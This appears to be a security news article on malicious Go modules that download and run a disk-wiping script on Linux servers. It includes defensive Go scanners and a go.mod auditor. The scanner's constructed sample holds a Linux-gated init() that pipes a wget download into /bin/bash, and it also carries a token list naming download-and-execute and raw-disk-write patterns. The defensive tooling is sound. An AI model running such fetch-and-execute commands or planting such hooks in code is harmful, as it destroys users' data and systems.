Linux Servers Under Attack: Disk-Wiping Malware in Go Modules
CAPITAL — May 9, 2024 — A sophisticated supply-chain attack is currently targeting Linux servers, unleashing disk-wiping malware through malicious Go modules on GitHub. Detected last month, the campaign uses three carefully crafted modules designed to fetch and execute a destructive payload. The attack can lead to irreversible data loss and system failure. As experts in cybersecurity, we explain further.
Linux Servers Under Attack: Disk-Wiping Malware Hidden in Go Modules
A supply-chain attack is targeting Linux servers, deploying disk-wiping malware through malicious Go modules published on GitHub. The campaign, detected last month, relies on three carefully crafted Go modules whose heavily obfuscated code is designed to retrieve and execute remote payloads.
The Destructive Payload: Complete Disk Destruction
The attack is specifically engineered for Linux-based servers and developer environments. The destructive payload, a Bash script named done.sh, uses the dd command to overwrite the entire primary disk with zeroes, which leads to irreversible data loss and system failure.
Before fetching anything, each module's Go code checks that it is running on Linux (runtime.GOOS == "linux"). The payload is therefore only downloaded and executed on the intended systems; the same module imported on a macOS or Windows workstation does nothing visible, which is one reason such code can pass casual testing.
According to an analysis by Socket, a supply-chain security company, the command overwrites every byte on the primary storage volume, /dev/sda, which typically holds the operating system, user files, databases, and configuration.
Filling the entire disk with zeros destroys the file-system structures, the operating system, and all user data, leaving the machine unbootable and its data unrecoverable.
Compromised Go Modules
Researchers discovered the attack in April and identified three malicious Go modules on GitHub. These modules have since been removed from the platform:
- github[.]com/truthfulpharm/prototransform
- github[.]com/blankloggia/go-mcp
- github[.]com/steelpoor/tlsproxy
Each module contained obfuscated code that, when decoded, revealed commands using wget to download the data-wiping script and pipe it straight into /bin/bash or /bin/sh for execution.
Socket researchers noted that the payload is executed immediately after it is downloaded, leaving virtually no time for response or recovery.
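Both tells described above, the runtime.GOOS == "linux" gate and an os/exec call that pipes a wget download into a shell, are visible in Go source and can be hunted for before a module is ever built. The scanner below is an added example written for this article, not Socket's tooling or code from the modules themselves. It parses a Go file with the standard go/ast package and reports every exec.Command call that is either gated on Linux or carries a fetch-and-run token in a string literal. The embedded sample module is constructed (example.invalid is a reserved name that never resolves); the second call in it deliberately assembles "wget" from bytes at run time to show why the gate alone is treated as a signal, since a literal scan cannot see strings that obfuscated code builds on the fly.

```go
package main

import (
	"fmt"
	"go/ast"
	"go/parser"
	"go/token"
	"go/types"
	"strconv"
	"strings"
)

// Finding is one os/exec call worth a human look: its line, whether it sits behind a Linux gate, and which tokens it carried.
type Finding struct {
	Line   int
	Gated  bool
	Tokens []string
}

// Substrings that, inside a command string, point to a download pipeline or a raw disk write.
var suspiciousTokens = []string{"wget ", "curl ", "| /bin/sh", "| /bin/bash", "| sh", "| bash", "/dev/sda", "if=/dev/zero"}

// isLinuxGate matches `runtime.GOOS == "linux"` with the operands in either order.
func isLinuxGate(e ast.Expr) bool {
	be, ok := e.(*ast.BinaryExpr)
	if !ok || be.Op != token.EQL {
		return false
	}
	x, y := types.ExprString(be.X), types.ExprString(be.Y)
	return x == "runtime.GOOS" && y == `"linux"` || y == "runtime.GOOS" && x == `"linux"`
}

// ScanSource parses one Go file and reports exec.Command/CommandContext calls that are gated on Linux
// or carry suspicious literal arguments. Strings assembled at run time are invisible here, hence the gate signal.
func ScanSource(filename, src string) ([]Finding, error) {
	fset := token.NewFileSet()
	f, err := parser.ParseFile(fset, filename, src, 0)
	if err != nil {
		return nil, err
	}
	var gates [][2]token.Pos // body ranges of Linux-gated ifs seen so far
	var findings []Finding
	// ast.Inspect is pre-order, so an IfStmt is recorded before the calls inside its body.
	ast.Inspect(f, func(n ast.Node) bool {
		switch node := n.(type) {
		case *ast.IfStmt:
			if isLinuxGate(node.Cond) {
				gates = append(gates, [2]token.Pos{node.Body.Pos(), node.Body.End()})
			}
		case *ast.CallExpr:
			fun := types.ExprString(node.Fun)
			if fun != "exec.Command" && fun != "exec.CommandContext" {
				return true
			}
			fnd := Finding{Line: fset.Position(node.Pos()).Line}
			for _, g := range gates {
				fnd.Gated = fnd.Gated || (node.Pos() >= g[0] && node.Pos() < g[1])
			}
			for _, arg := range node.Args {
				lit, ok := arg.(*ast.BasicLit)
				if !ok || lit.Kind != token.STRING {
					continue
				}
				s, _ := strconv.Unquote(lit.Value)
				for _, tok := range suspiciousTokens {
					if strings.Contains(s, tok) {
						fnd.Tokens = append(fnd.Tokens, tok)
					}
				}
			}
			if fnd.Gated || len(fnd.Tokens) > 0 {
				findings = append(findings, fnd)
			}
		}
		return true
	})
	return findings, nil
}

// sampleSource is a constructed stand-in for a malicious module; example.invalid never resolves.
const sampleSource = `package sneaky
import ("os/exec"; "runtime")
func init() {
	if runtime.GOOS == "linux" {
		exec.Command("/bin/sh", "-c", "wget -O - https://example.invalid/done.sh | /bin/bash").Run()
	}
}
func Decoy() {
	exec.Command("ls", "-l").Run() // benign: not gated, no suspicious tokens
	cmd := string([]byte{0x77, 0x67, 0x65, 0x74}) // "wget" built at run time, invisible to a literal scan
	if "linux" == runtime.GOOS {
		exec.Command(cmd).Run()
	}
}
`

func main() {
	fmt.Println(ScanSource("sample.go", sampleSource))
}
```

Run over the sample, the scanner reports the init() call on line 5 (gated, tokens "wget " and "| /bin/bash") and the Decoy call on line 12 (gated, no tokens), while the plain ls call is ignored. A gated exec with no readable command string is exactly the shape to triage by hand, because the honest reasons to branch on runtime.GOOS before spawning a process are few.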
The malicious Go modules appear to have impersonated legitimate projects:
- Prototransform: A project for converting message data to various formats.
- go-mcp: A Go implementation of the Model Context Protocol.
- tlsproxy: A TLS proxy tool providing encryption for TCP and HTTP servers.
The Go Ecosystem: A Vulnerable Landscape
Socket researchers warn that even minimal exposure to these destructive modules can lead to complete data loss.
The Go ecosystem is decentralized: there is no central package registry, and a module path is simply a repository path, so modules from different developers can share the same name under different prefixes, and nothing vets what a newly published path contains. Attackers exploit this by publishing module paths that look legitimate and waiting for developers to pull the malicious code into their projects.
FAQ: Protecting Your Linux Servers
Mitigation Strategies
- Implement strict dependency management policies, such as pinning versions and reviewing every new module path before it enters go.mod.
- Regularly scan for vulnerabilities and malicious code in your Go modules.
- Verify the authenticity and integrity of third-party packages. Note that go mod verify and the Go checksum database only confirm that the bytes you downloaded match what everyone else received; they do not vouch for what those bytes do, so provenance has to be checked separately.
- Use a reputable supply-chain security tool to monitor your dependencies.
- Maintain regular backups of your critical data, stored off the host, since a payload that zero-fills /dev/sda takes any local backups with it.
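The namespace problem described above (same base name, different prefix) and the verification step in the list lend themselves to a mechanical check on go.mod before anything is fetched. The program below is an added example written for this article, not a Socket product or part of the Go toolchain. It parses the require directives of a go.mod, then flags every module that falls outside an allow-listed set of path prefixes or that reuses the base name of a known module under a different path. The go.mod, the trusted prefixes and the github.com/example-org/... "known" modules are all constructed for the demonstration; the three malicious paths are the ones named in the article, and the version numbers are made up.

```go
package main

import (
	"bufio"
	"fmt"
	"sort"
	"strings"
)

// Policy is a constructed dependency policy: path prefixes importable without review, plus
// canonical paths of well-known modules whose base names a squatter might reuse elsewhere.
type Policy struct {
	TrustedPrefixes []string
	KnownModules    []string
}

type Verdict struct {
	Module, Version string
	Issues          []string
}

// ParseRequires maps module path -> version from go.mod text, handling both the single-line
// and block forms of `require` and ignoring trailing comments such as "// indirect".
func ParseRequires(gomod string) map[string]string {
	reqs := map[string]string{}
	inBlock := false
	sc := bufio.NewScanner(strings.NewReader(gomod))
	for sc.Scan() {
		line := sc.Text()
		if i := strings.Index(line, "//"); i >= 0 {
			line = line[:i]
		}
		f := strings.Fields(line)
		switch {
		case len(f) == 0:
		case f[0] == "require" && len(f) == 2 && f[1] == "(":
			inBlock = true
		case inBlock && f[0] == ")":
			inBlock = false
		case inBlock && len(f) == 2:
			reqs[f[0]] = f[1]
		case f[0] == "require" && len(f) == 3:
			reqs[f[1]] = f[2]
		}
	}
	return reqs
}

// baseName is the lower-cased final path element: "go-mcp" for github.com/x/go-mcp.
func baseName(module string) string {
	return strings.ToLower(module[strings.LastIndex(module, "/")+1:])
}

// AuditGoMod reports, in module-path order, every requirement outside the trusted prefixes
// or sharing its base name with a known module under a different full path.
func AuditGoMod(gomod string, pol Policy) []Verdict {
	var out []Verdict
	for p, ver := range ParseRequires(gomod) {
		v := Verdict{Module: p, Version: ver}
		trusted := false
		for _, pre := range pol.TrustedPrefixes {
			trusted = trusted || strings.HasPrefix(p, pre)
		}
		if !trusted {
			v.Issues = append(v.Issues, "outside trusted prefixes")
		}
		for _, known := range pol.KnownModules {
			if p != known && baseName(p) == baseName(known) {
				v.Issues = append(v.Issues, "lookalike of "+known)
			}
		}
		if len(v.Issues) > 0 {
			out = append(out, v)
		}
	}
	sort.Slice(out, func(i, j int) bool { return out[i].Module < out[j].Module })
	return out
}

// Constructed go.mod using the three module paths named above; the versions are made up.
const sampleGoMod = `module example.invalid/app
require (
	golang.org/x/crypto v0.23.0
	github.com/blankloggia/go-mcp v0.1.0
	github.com/steelpoor/tlsproxy v1.0.0 // indirect
)
require github.com/truthfulpharm/prototransform v0.2.0
`

// Constructed policy; github.com/example-org/... is a placeholder for the real upstream projects.
var samplePolicy = Policy{
	TrustedPrefixes: []string{"golang.org/x/", "github.com/example-org/"},
	KnownModules:    []string{"github.com/example-org/go-mcp", "github.com/example-org/prototransform"},
}

func main() {
	fmt.Println(AuditGoMod(sampleGoMod, samplePolicy))
}
```

Against the sample, golang.org/x/crypto passes, github.com/steelpoor/tlsproxy is flagged only for sitting outside the trusted prefixes, and the go-mcp and prototransform paths are flagged twice, once for the prefix and once as lookalikes of the allow-listed modules with the same base name. A check like this belongs in CI before go build runs, because it is the build, not the audit, that downloads and compiles the module.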